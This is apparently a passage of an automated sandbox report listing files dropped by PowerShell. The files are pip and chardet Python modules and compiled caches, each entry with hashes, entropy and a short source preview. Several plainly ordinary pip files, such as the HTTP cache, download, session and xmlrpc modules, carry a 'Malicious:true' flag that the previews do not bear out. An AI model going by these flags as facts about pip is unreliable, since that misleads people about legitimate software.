                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j&..................e.........Z...G.d...d.e.j,..................j...........................Z.y.).z#xmlrpclib.Transport implementation......N)...TYPE_CHECKING..Tuple)...NetworkConnectionError)...PipSession)...raise_for_status)..._HostType.._Marshallable)...SizedBufferc.....................^.......e.Z.d.Z.d.Z...d.d.e.d.e.d.e.d.d.f...f.d...Z...d.d.d.d.e.d.d.d.e.d.e.d.....f.d...Z...x.Z.S.)...PipXmlrpcTransportzRProvide a `xmlrpclib.Transport` implementation via a `PipSession`. object.. ..index_url..session..use_datetime..returnNc............................t...........|.....|...........t.........j...................j...................|.........}.|.j...................|._.........|.|._.........y.).N)...super..__init__..urllib..parse..urlparse..scheme.._scheme.._session)...selfr....r....r......index_parts..__class__s....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20541
                                                                                                                                                                                                                              Entropy (8bit):4.419441847140077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:GaxaV08sO0OLp5haOVKX2D/k5EzOEJlRL+jqrsLRjcqsWIv3LfW7Mvi+gIQFuRnG:Gaxa1p7kSTRiOQLxlITLqNXkB64oig6O
                                                                                                                                                                                                                              MD5:1D3CF7B4C916B82AED3878328B7A9C00
                                                                                                                                                                                                                              SHA1:B3C8663B501DE3A9B1A17EB858C83621158A3BF3
                                                                                                                                                                                                                              SHA-256:4C2F8E716D8A5385BA475854E2A3E0417BD51F9E1A7400A9673EAC5AAF91F4D0
                                                                                                                                                                                                                              SHA-512:BC4BC794485A676FE44A19ECE5EFDDC8EA0F012BDEABB389BEBD0171EA9BA385CCDCD1CF5203833728D1BA2B96E24B07A825EFD020AD3321822EAECAF434DFFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Network Authentication Helpers..Contains interface (MultiDomainBasicAuth) and associated glue code for.providing credentials in the context of network requests..""".import logging.import os.import shutil.import subprocess.import sysconfig.import typing.import urllib.parse.from abc import ABC, abstractmethod.from functools import lru_cache.from os.path import commonprefix.from pathlib import Path.from typing import Any, Dict, List, NamedTuple, Optional, Tuple..from pip._vendor.requests.auth import AuthBase, HTTPBasicAuth.from pip._vendor.requests.models import Request, Response.from pip._vendor.requests.utils import get_netrc_auth..from pip._internal.utils.logging import getLogger.from pip._internal.utils.misc import (. ask,. ask_input,. ask_password,. remove_auth_from_url,. split_auth_netloc_from_url,.).from pip._internal.vcs.versioncontrol import AuthInfo..logger = getLogger(__name__)..KEYRING_DISABLED = False...class Credentials(NamedTuple):. url: str. usernam
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3935
                                                                                                                                                                                                                              Entropy (8bit):4.5367459930518805
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eatn8+Vt8CLtSKYrAdjB98ic5XENd02jagd02t/:VtjHpplcyPjaqPt/
                                                                                                                                                                                                                              MD5:BD5623B783BCC7693C921082172F561C
                                                                                                                                                                                                                              SHA1:2521F1CC06B3F0DC49CFAA39223E69BEA749BFA7
                                                                                                                                                                                                                              SHA-256:E3C03DEF5A82CCA345BE46F9EEE18493BFB4C5AA8F4B41D68F6EF5D50353C645
                                                                                                                                                                                                                              SHA-512:531BCD976F686F08C297C847D824FF2AC07AB2EB4FE4FC681D48203843A887CC31DEF5DA0BD674639A84E2DE545EAEA393AFCCE022171558A405493198024B9C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""HTTP cache implementation.."""..import os.from contextlib import contextmanager.from datetime import datetime.from typing import BinaryIO, Generator, Optional, Union..from pip._vendor.cachecontrol.cache import SeparateBodyBaseCache.from pip._vendor.cachecontrol.caches import SeparateBodyFileCache.from pip._vendor.requests.models import Response..from pip._internal.utils.filesystem import adjacent_tmp_file, replace.from pip._internal.utils.misc import ensure_dir...def is_from_cache(response: Response) -> bool:. return getattr(response, "from_cache", False)...@contextmanager.def suppressed_cache_errors() -> Generator[None, None, None]:. """If we can't access the cache then we can just skip caching and process. requests as if caching wasn't enabled.. """. try:. yield. except OSError:. pass...class SafeFileCache(SeparateBodyBaseCache):. """. A file based cache which is safe to use even when the target directory may. not be accessible or writable.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6086
                                                                                                                                                                                                                              Entropy (8bit):4.535167015839178
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:w7W+0c7gLaX0VXLCrMiZZb0r3FAlBEm+1swUGgsMtG+1sAXhxe1Nw:w7t7xA+rLZZbe+lqJ2x
                                                                                                                                                                                                                              MD5:33EE21DB91B4122F1E32ED1E8EA926E6
                                                                                                                                                                                                                              SHA1:69610A1F064A6FAC3514A158BB4B45A4EED5D672
                                                                                                                                                                                                                              SHA-256:8B44E7E79083E43ED7604158DD3C6261A09FD0E69A4D0E9249C3600AC49E575E
                                                                                                                                                                                                                              SHA-512:4F1835E1F37F586F38A6DC091FF63ACEA677B678A4B635922A7949830CC7E3B09CB6E87250A4F870D7DEF636C90CEEFF4463D6555F280FFE46B078B0C43BA2A4
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Download files with progress indicators..""".import email.message.import logging.import mimetypes.import os.from typing import Iterable, Optional, Tuple..from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.cli.progress_bars import get_download_progress_renderer.from pip._internal.exceptions import NetworkConnectionError.from pip._internal.models.index import PyPI.from pip._internal.models.link import Link.from pip._internal.network.cache import is_from_cache.from pip._internal.network.session import PipSession.from pip._internal.network.utils import HEADERS, raise_for_status, response_chunks.from pip._internal.utils.misc import format_size, redact_auth_from_url, splitext..logger = logging.getLogger(__name__)...def _get_http_response_size(resp: Response) -> Optional[int]:. try:. return int(resp.headers["content-length"]). except (ValueError, KeyError, TypeError):. return None...def _prepare_download(. resp: Response,. lin
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7638
                                                                                                                                                                                                                              Entropy (8bit):4.533018537440655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:lmeq3Fhp8FzQpt6uga8eTs/ChNn0dutBcBU88DDrUdWPpi0PB/Ql:PyKFK6u0qs/s0IoUnzUdWPPxY
                                                                                                                                                                                                                              MD5:4C80D4FD2859B4B10C585AACC0F95FCA
                                                                                                                                                                                                                              SHA1:90F90B661EFB4AE55C9C0E5174C5F3F36128F344
                                                                                                                                                                                                                              SHA-256:D8F5D576E6193C23D99244057B527519B7C725678253EF855E89C6C887F0F5E5
                                                                                                                                                                                                                              SHA-512:AB278D291E57C3D8DA0AD3DD055A61C78D0512FECCEB3D89D12512EF5295CAEF23D0BD07E4D67EE8158B1D7A100FD9793745A327E059C82C950C5E69539954FA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Lazy ZIP over HTTP"""..__all__ = ["HTTPRangeRequestUnsupported", "dist_from_wheel_url"]..from bisect import bisect_left, bisect_right.from contextlib import contextmanager.from tempfile import NamedTemporaryFile.from typing import Any, Dict, Generator, List, Optional, Tuple.from zipfile import BadZipFile, ZipFile..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.metadata import BaseDistribution, MemoryWheel, get_wheel_distribution.from pip._internal.network.session import PipSession.from pip._internal.network.utils import HEADERS, raise_for_status, response_chunks...class HTTPRangeRequestUnsupported(Exception):. pass...def dist_from_wheel_url(name: str, url: str, session: PipSession) -> BaseDistribution:. """Return a distribution object from the given wheel URL... This uses HTTP range requests to only fetch the portion of the wheel. containing metadata, just enough for the o
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18698
                                                                                                                                                                                                                              Entropy (8bit):4.5751244682162
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:yeSx8+6E6RtPmwaJDzMzK64lU61dg5cfJfWMhjP3Cn+N8Y9kMs3SZY45Y5yrGH3R:yrx5hqtPSLCqP0yG4OjH30e
                                                                                                                                                                                                                              MD5:ED400E3CC8FE5CF4936A8A63056F2652
                                                                                                                                                                                                                              SHA1:4AE82ECA21AF93318FBD8419A0BEF7C8350AC27B
                                                                                                                                                                                                                              SHA-256:F6DA840C3F0989568576994E117271368F5C8D17C167A4486B4C9043FA813623
                                                                                                                                                                                                                              SHA-512:5EA9E5BEE9E50A2E2A7C66135C313E1C6D295CC0532004B2CF4A97E041E7AE86B269F4F57C8AE6B349673E18FF22AC47B3DF0DE8B1FB8293CCF2BCB8301083EE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""PipSession and supporting code, containing all pip-specific.network request configuration and behavior.."""..import email.utils.import io.import ipaddress.import json.import logging.import mimetypes.import os.import platform.import shutil.import subprocess.import sys.import urllib.parse.import warnings.from typing import (. TYPE_CHECKING,. Any,. Dict,. Generator,. List,. Mapping,. Optional,. Sequence,. Tuple,. Union,.)..from pip._vendor import requests, urllib3.from pip._vendor.cachecontrol import CacheControlAdapter as _BaseCacheControlAdapter.from pip._vendor.requests.adapters import DEFAULT_POOLBLOCK, BaseAdapter.from pip._vendor.requests.adapters import HTTPAdapter as _BaseHTTPAdapter.from pip._vendor.requests.models import PreparedRequest, Response.from pip._vendor.requests.structures import CaseInsensitiveDict.from pip._vendor.urllib3.connectionpool import ConnectionPool.from pip._vendor.urllib3.exceptions import InsecureRequestWarning..from pip i
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4073
                                                                                                                                                                                                                              Entropy (8bit):4.467621998619944
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:AyJmdmk/IlIqS8Jz8ZFy2u/u2EPqg9d+Ha+IIIbgmoj0:AmmYkF8JIjyJm/Pqg9d+HauJ0
                                                                                                                                                                                                                              MD5:753632450165D0EFF8C4751A18D5CCE5
                                                                                                                                                                                                                              SHA1:A2F5A9510319D95ADE4777BF462996CD0456E6E7
                                                                                                                                                                                                                              SHA-256:E80E52AD42441141F16C6B5BB1CC14D8DA42CB3FB7CED883946587A51461B09F
                                                                                                                                                                                                                              SHA-512:8549E7FC56D2D224AFA391AA6C1C884FB5B665BE38D469E139B18837A622D7E4E99CB59A827F3BB770562AD59CD9E6FB71619D786B41759ED7D9E468BD45F43C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import Dict, Generator..from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.exceptions import NetworkConnectionError..# The following comments and HTTP headers were originally added by.# Donald Stufft in git commit 22c562429a61bb77172039e480873fb239dd8c03..#.# We use Accept-Encoding: identity here because requests defaults to.# accepting compressed responses. This breaks in a variety of ways.# depending on how the server is configured..# - Some servers will notice that the file isn't a compressible file.# and will leave the file alone and with an empty Content-Encoding.# - Some servers will notice that the file is already compressed and.# will leave the file alone, adding a Content-Encoding: gzip header.# - Some servers won't notice anything at all and will take a file.# that's already been compressed and compress it again, and set.# the Content-Encoding: gzip header.# By setting this to request only the identity encoding we're h
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1838
                                                                                                                                                                                                                              Entropy (8bit):4.43781542816708
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:yb9H7vgk5JYfH6+/1GFPzdvsJTxW9KMOWP:ap35Jya+dSP2JVQOWP
                                                                                                                                                                                                                              MD5:48F03AE3E7D166533D1FE1C50465C95E
                                                                                                                                                                                                                              SHA1:1B9D05D0166567A0F7B6D0295E5450CE8627CB64
                                                                                                                                                                                                                              SHA-256:B00C7339A709F8DD4D5C63EF6A9F630B7CEE6164A79EFDC65ED811DBE13600F0
                                                                                                                                                                                                                              SHA-512:F6F196C93BF36CA05C3B7D66F922D3278C85014F601B6A147F582A696770F146C08FA989279054AF80ACAC63FBB8A106EF8F1D87F70F2CD4870899E153B15E61
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""xmlrpclib.Transport implementation."""..import logging.import urllib.parse.import xmlrpc.client.from typing import TYPE_CHECKING, Tuple..from pip._internal.exceptions import NetworkConnectionError.from pip._internal.network.session import PipSession.from pip._internal.network.utils import raise_for_status..if TYPE_CHECKING:. from xmlrpc.client import _HostType, _Marshallable.. from _typeshed import SizedBuffer..logger = logging.getLogger(__name__)...class PipXmlrpcTransport(xmlrpc.client.Transport):. """Provide a `xmlrpclib.Transport` implementation via a `PipSession`. object.. """.. def __init__(. self, index_url: str, session: PipSession, use_datetime: bool = False. ) -> None:. super().__init__(use_datetime). index_parts = urllib.parse.urlparse(index_url). self._scheme = index_parts.scheme. self._session = session.. def request(. self,. host: "_HostType",. handler: str,. request_body: "SizedBuff
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.590561677312576
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:oxWOlllVO8l4YFK5VcK85kdVWrzLUhKALOAX4L9RwIaQHtgem/l:gl/VneYw52KNdAreKAqAIZ6Iaatgem/l
                                                                                                                                                                                                                              MD5:B568E4080CEB3CCD09DCBA0F09D521AF
                                                                                                                                                                                                                              SHA1:6C4770D793501F41E573841DDEF6616BFB9FE97E
                                                                                                                                                                                                                              SHA-256:B70C5E497BEDEDF1D34EB9EA602B6206194A4A73258B3985A166C7EBF9F18657
                                                                                                                                                                                                                              SHA-512:0CA53FB595114418DF6D0600EDBD9B5D4036A3A87D14EE49DD4398A023ACE242A6981CCB45EB6234FB403B64D14461348B27A048D606C8A7227EB8C1C3EE70DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................y.).N..r..........RC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/operations/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7561
                                                                                                                                                                                                                              Entropy (8bit):5.614102977081472
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:qt3UWTJ1fCjY5AxTXr1ysXCvBpvscGpyvv01aiY0//xB8a0x6qAPSu0Zbh:qtEWF1fCEE0pkcGpyvv0T7/n8aPqu0ZF
                                                                                                                                                                                                                              MD5:47D286C6024E84FBFB85906C6A7CB988
                                                                                                                                                                                                                              SHA1:EF4D6B93F15498245AA060818EB04C2562FB56A4
                                                                                                                                                                                                                              SHA-256:7CD3498189DDF5567B126FEFB3A803EA8FB7914A8BA6258BE21E91033F126279
                                                                                                                                                                                                                              SHA-512:295AD105DF806BF1576279044490EC473510010164C3B8EFC4877FDBDD0BDED117B11BF1022684133241957277C54BC419A89D82D1D54BDAE2D59F72700F8B1A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j:..................e.........Z...G.d...d.e.........Z e.e.e f.....Z!e.e.e.f.....Z"e.e.e.e.f.....Z#e.e.e.e"....f.....Z$e.e.e.e#....f.....Z%e.e$e%f.....Z&e.e!e&f.....Z'd.e.e!e(f.....f.d...Z)..d.d.e!d.e.e.e*g.e(f.........d.e&f.d...Z+d.e.e.....d.e'f.d...Z,d.e.e.....d.e!d.e.e.....f.d...Z-d.e.e.....d.e!d.e.e.....f.d...Z.d.e!d.d.f.d...Z/y.).z'Validation of dependencies of packages......N)...Callable..Dict..List..NamedTuple..Optional..Set..Tuple)...Requirement)...LegacySpecifier)...NormalizedName..canonicalize_name)...LegacyVersion)..)make_distribution_for_install_requirement)...get_default_environment)...DistributionVersion)...InstallRequirement)...deprecatedc.....................(.....e.Z.d.Z.U.e.e.d.<...e.e.....e.d.<...y.)...PackageDetails..version..dependenciesN)...__name__..__module__
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset -0.000000, slope 39711564957757582440660992.000000
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):38628
                                                                                                                                                                                                                              Entropy (8bit):3.950146871830005
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:SpAMu7ERuwz+NmJCwTXnplXP9WNc4kLbm3pzU/cpe6Cl5owxR6frS6Rv/:97Exz+4J3rnp5P9dtipzU/csxkfm69
                                                                                                                                                                                                                              MD5:7EF62DD47E2F47B184F7234A2C2F77D0
                                                                                                                                                                                                                              SHA1:8A761955C19C7668F4BB6BFE0FCEBFAEE03826CF
                                                                                                                                                                                                                              SHA-256:F3C6E2D32E478C212B321F3C2F08C473426CA212BEFB81442C95F50204CDF7BC
                                                                                                                                                                                                                              SHA-512:5D131D9C66845119E93F1D64147125428F12F5805D406B79327A80082CC18F430286F9003FFFD4E727CDED40DE172A1021B3D1B08DE1A7A1A396DE934C69CB8D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.v........................3....U.d.d.l.m.Z...d.d.l.m.Z...d.Z.e.j...................e.j...................e.j...................d.e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................f.Z.d.Z.e.d.e.e.d.d...Z.e.e.d.<...d.Z.g.e.j.....................e.j.....................d...e.j.....................e.j.....................e.j.....................d...d...e.j.....................d...e.j.....................e.j.....................e.j.....................e.j.....................e.j.....................e.j.....................e.j.....................e.j.....................e.j.....................e.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):615
                                                                                                                                                                                                                              Entropy (8bit):5.2868801191038015
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:Bp45dYMdApe+C3zPuV0LKNnaCjWk5/9DEywO2lJO+iW3Cx1Svt:zsdDApz0PjKNnbN/qywrlJO+Dbl
                                                                                                                                                                                                                              MD5:7AADA8AC9954536EF7614E7EC8CB8FA4
                                                                                                                                                                                                                              SHA1:B4BAB6B9D914F4C456D125E83F98C75787C4392D
                                                                                                                                                                                                                              SHA-256:515EEBBB5F108EFA23261ACD1A4C4297EFE41DDB1A4ADE3BD93EB250EE3FCF66
                                                                                                                                                                                                                              SHA-512:F87B2B174CA6C9EAF11E9AC22572305922E340DBB24FBF2E891A88535D5F2260BF3D8F9BF03BF85BABE88CFA3BF7C3CDA9559C101ACC9EDAD424D22CAC3A6A36
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................@.....d.d.l.m.Z.m.Z...e.r.d.d.l.m.Z.....G.d...d.e.........Z.y.e.Z.y.)......)...TYPE_CHECKING..Optional)...TypedDictc.....................8.....e.Z.d.Z.U.e.e.....e.d.<...e.e.d.<...e.e.....e.d.<...y.)...ResultDict..encoding..confidence..languageN)...__name__..__module__..__qualname__r......str..__annotations__..float........OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/chardet/resultdict.pyr....r........s..........3.-.............3.-...r....r....N)...typingr....r....r....r......dictr....r....r......<module>r........s#..........*.......!.... .Y.... ......Jr....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6370
                                                                                                                                                                                                                              Entropy (8bit):5.083520410704062
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NfteoiTTDiMke8QHVMpQE/cBwJDTO12SZWtDOmyT9j8:NFe1DiXGEHPw2Byxj8
                                                                                                                                                                                                                              MD5:00C868AA6CD6512DA1ABA07E7D0C70C9
                                                                                                                                                                                                                              SHA1:C7C3FC42075404AC154E4B29566973AC9B1FE7DA
                                                                                                                                                                                                                              SHA-256:94A1CE2AB152D0AF2050FB2154D2BC62D77FED47AF6FC5A01C15A958489AFF9A
                                                                                                                                                                                                                              SHA-512:6A9311738ED25285617B560CCD5980F980D02F1BE8EA342C97D737A899B7F92DDAAE7EC505D9000F94BD82B2D9620B495B8692C5122E5302E79B0EEF0C21A938
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................l.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...Dict..List..NamedTuple..Optional..Union.....)...CharSetProber)...CharacterCategory..ProbingState..SequenceLikelihoodc.....................r.....e.Z.d.Z.U.e.e.d.<...e.e.d.<...e.e.e.f.....e.d.<...e.e.e.e.e.f.....f.....e.d.<...e.e.d.<...e.e.d.<...e.e.d.<...y.)...SingleByteCharSetModel..charset_name..language..char_to_order_map..language_model..typical_positive_ratio..keep_ascii_letters..alphabetN)...__name__..__module__..__qualname__..str..__annotations__r......int..float..bool........TC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/chardet/sbcharsetprober.pyr....r....#...sD...............M....C...H.~..%......d.3...8.n..,..-..-..!..!..........Mr....r....c............................e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.....d.d.e.d.e.d.e.e.....d.d.f...f.d...Z.d...f.d...Z.e.d.e.e.....f.d...........Z.e.d.e.e.....f.d...........Z.d.e.e.e.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2340
                                                                                                                                                                                                                              Entropy (8bit):5.378939043778716
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:BhTkA7ZT0Hz2Y2RWi/tgFcy/FEq7OpVuxwAS6agLlx8Hl:zkA7ZTOz2Y2RWkeEOObuqTJF
                                                                                                                                                                                                                              MD5:1EE3F816F38AA1FC3195FAC5BA3762C7
                                                                                                                                                                                                                              SHA1:2D16B223ED9FCD7FBE13F8E855F0556EC2040106
                                                                                                                                                                                                                              SHA-256:2D01D32591BEB794A18C03F49B93681CD28F1997DB29EB53E819CB15613B61B9
                                                                                                                                                                                                                              SHA-512:A3C235BA8240EE81427DC32C31FDAB9EC64398BEF5C7BF1D4390B617A015035AE8972A6013BC091B95535519C068B7BADD4FC272CB3E960F775F6EF995E80126
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf)..............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...CharSetGroupProber)...HebrewProber)...ISO_8859_5_BULGARIAN_MODEL..WINDOWS_1251_BULGARIAN_MODEL)...ISO_8859_7_GREEK_MODEL..WINDOWS_1253_GREEK_MODEL)...WINDOWS_1255_HEBREW_MODEL)...IBM855_RUSSIAN_MODEL..IBM866_RUSSIAN_MODEL..ISO_8859_5_RUSSIAN_MODEL..KOI8_R_RUSSIAN_MODEL..MACCYRILLIC_RUSSIAN_MODEL..WINDOWS_1251_RUSSIAN_MODEL)...TIS_620_THAI_MODEL)...ISO_8859_9_TURKISH_MODEL)...SingleByteCharSetProberc..................... .......e.Z.d.Z.d...f.d...Z...x.Z.S.)...SBCSGroupProberc.....................&.......t...........|...............t.................}.t.........t.........d.|...........}.t.........t.........d.|...........}.|.j...................|.|...........t.........t.................t.........t.................t.........t.................t.........t.................t........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4478
                                                                                                                                                                                                                              Entropy (8bit):4.986717094917888
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:9KYuihhkMPddmCFSzUkCWmZqlXAG3Op+/9ox6bnQIU7UxFVB8DsSvaPIEhFH:9Tv0MFpF0F9moS+/9k/uqePIQp
                                                                                                                                                                                                                              MD5:CD556113DA837CF305A68D34F34794F7
                                                                                                                                                                                                                              SHA1:795DD7091C757F40BC89C80CD89A6EF75CE3C1CE
                                                                                                                                                                                                                              SHA-256:EB901B7F7196803BD4BD21A6DD803F1E5EA45BE0C1E1A9DC2023BE064578BC45
                                                                                                                                                                                                                              SHA-512:3D6C68E7D99CBD7BBC8F21840894B699634179998A8B61E46F48E34ACE42EED1B0DC7453E396B1757700B99219CA4588356D517E19F6FE8D3EF9619740D3B53D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................r.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...Union.....)...SJISDistributionAnalysis)...CodingStateMachine)...MachineState..ProbingState)...SJISContextAnalysis)...MultiByteCharSetProber)...SJIS_SM_MODELc.....................~.......e.Z.d.Z.d...f.d...Z.d...f.d...Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.d.e.e.e.f.....d.e.f.d...Z.d.e.f.d...Z...x.Z.S.)...SJISProber..returnc............................t...........|...............t.........t.................|._.........t.................|._.........t.................|._.........|.j.............................y...N)...super..__init__r....r......coding_smr......distribution_analyzerr......context_analyzer..reset....self..__class__s.... ..OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/chardet/sjisprober.pyr....z.SJISProber.__init__'...s9...................+.M..:.....%=.%?....". 3. 5...................c.....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12252
                                                                                                                                                                                                                              Entropy (8bit):5.218887991885278
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:0ybKWbIrBCYmeHKU73tNJy6QXo9BTCaRvn6toxre0Qn2:fumuCYmSZxNJy6Q49hv4MZQ2
                                                                                                                                                                                                                              MD5:CA283ED90FBF626978943128E993D866
                                                                                                                                                                                                                              SHA1:631F8235E2DE8494DB913D0BC0B28C609F4094CC
                                                                                                                                                                                                                              SHA-256:0C705E8B0E93501E4EC49F5BF891BAE47F30D68261D7B1877B3B5B91023D1CFD
                                                                                                                                                                                                                              SHA-512:979F51ED4A2B8A2D3C127A23C383D82DCE715B18A26C5327B6A8E12A4A745530DC3BF4A7B5B4C3EFF4C56B6C44D51640ABB996068761D3BE9F9F255AA2B2677C
                                                                                                                                                                                                                              Malicious:false
